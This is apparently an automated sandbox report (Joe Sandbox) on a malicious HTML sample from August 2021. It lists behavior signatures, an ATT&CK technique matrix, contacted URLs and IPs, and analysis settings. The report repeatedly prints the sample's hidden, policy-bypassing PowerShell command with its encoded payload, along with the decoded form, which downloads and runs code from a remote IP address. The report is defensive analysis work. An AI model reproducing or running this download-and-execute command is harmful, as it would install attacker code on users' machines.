    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Suspicious powershell command line found
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA6838022D pushad ; iretd 22_2_00007FFA68380231
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA68383BE5 pushad ; retf 22_2_00007FFA68383BE9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows DefenderJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140 Thread sleep count: 2493 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724 Thread sleep count: 6563 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1252 Thread sleep count: 162 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3544 Thread sleep time: -9223372036854770s >= -30000s
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2493
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6563
    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: explorer.exe, 0000000C.00000000.9961640635.00000000081C8000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
    Source: explorer.exe, 0000000C.00000000.9833336490.000000000074B000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000z
    Source: explorer.exe, 0000000C.00000000.9961915558.0000000008236000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000C.00000000.9885527712.000000000437C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 0000000C.00000000.9883654784.0000000004302000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000C.00000000.9941513322.000000000568F000.00000004.00000001.sdmpBinary or memory string: VMware V
    Source: explorer.exe, 0000000C.00000000.9962482225.00000000082BD000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-
    Source: powershell.exe, 00000016.00000002.10533791656.000001C9472E5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 0000000C.00000000.9833336490.000000000074B000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
    Source: explorer.exe, 0000000C.00000000.9958911327.0000000007740000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.10534697451.000001C947600000.00000002.00000001.sdmpBinary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
    Source: explorer.exe, 0000000C.00000000.9961378376.000000000816A000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected Powershell download and execute
    Source: Yara matchFile source: C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt, type: DROPPED
    Bypasses PowerShell execution policy
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://185.244.41.28/click.php")
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: explorer.exe, 0000000C.00000000.9835683299.0000000000CB1000.00000002.00000001.sdmpBinary or memory string: Program Manager&
    Source: explorer.exe, 0000000C.00000000.9941513322.000000000568F000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 0000000C.00000000.9833336490.000000000074B000.00000004.00000020.sdmpBinary or memory string: Progman
    Source: explorer.exe, 0000000C.00000000.9835683299.0000000000CB1000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
    | Valid Accounts | Command and Scripting Interpreter 1 | DLL Side-Loading 1 | Process Injection 12 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
    | Default Accounts | Scripting 11 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 21 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
    | Domain Accounts | PowerShell 6 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
    | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Virtualization/Sandbox Evasion 21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud |
    | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 11 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
    | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
    | External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | System Information Discovery 12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

    Behavior Graph

    [Behavior graph: ID 299, Sample: file.html, Start date: 16/08/2021, Architecture: WINDOWS, Score: 88]

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs


    Domains and IPs

    Contacted Domains


    Contacted URLs

    | Name | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|
    | http://185.244.41.28/click.php | false | Avira URL Cloud: safe | unknown |

    URLs from Memory and Binaries
                                                                                      http://www.soso.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        http://busca.orange.es/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000000C.00000000.9934649714.00000000051D0000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.target.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.iask.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://meet.google.commirroring_common.js.1.drfalse
                                                                                                  high
                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://service2.bfast.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.msn.com/de-ch/?ocid=iehpexplorer.exe, 0000000C.00000000.9999011237.000000000E1F7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.9997540215.000000000DFF5000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://ariadna.elmundo.es/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://apis.google.commanifest.json0.1.dr, d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, manifest.json2.1.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drfalse
                                                                                                          high
                                                                                                          http://www.news.com.au/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.cdiscount.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.tiscali.it/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://it.search.yahoo.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.ceneo.pl/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.servicios.clarin.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.daum.net/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.kkbox.com.tw/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://search.goo.ne.jp/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://www.google.com/intl/en-US/chrome/blank.htmlcraw_background.js.1.drfalse
                                                                                                                        high
                                                                                                                        http://search.msn.com/results.aspx?q=explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://list.taobao.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.taobao.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.etmall.com.tw/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://ie.search.yahoo.com/os?command=explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.cnet.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.linternaute.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.amazon.co.uk/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.cdiscount.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.asharqalawsat.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.google.fr/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.gismeteo.ru/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.rtl.de/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.soso.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.univision.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.ipop.co.kr/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.auction.co.kr/auction.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.orange.fr/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://video.globo.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.google.co.uk/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.founder.com.cn/cnexplorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://buscador.terra.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://search1.taobao.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.aol.co.uk/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://search.dreamwiz.com/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://clients2.googleusercontent.comd674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.recherche.aol.fr/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://vachercher.lycos.fr/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.excite.co.jp/explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.nate.com/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.ocn.ne.jp/favicon.icoexplorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown

                                                                                                                                                                Contacted IPs

                                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.217.168.46 | clients.l.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.13 | accounts.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.78 | sb-ssl.l.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
169.254.68.153 | unknown | Reserved | 6966 | USDOSUS | false
185.244.41.28 | unknown | Russian Federation | 204490 | ASKONTELRU | false
172.217.168.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false

                                                                                                                                                                Private

                                                                                                                                                                IP
                                                                                                                                                                192.168.2.1
                                                                                                                                                                192.168.2.3
                                                                                                                                                                127.0.0.1

                                                                                                                                                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 299
Start date: 16.08.2021
Start time: 19:09:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: file.html
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal88.bank.evad.winHTML@48/262@13/10
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                • Number of executed functions: 11
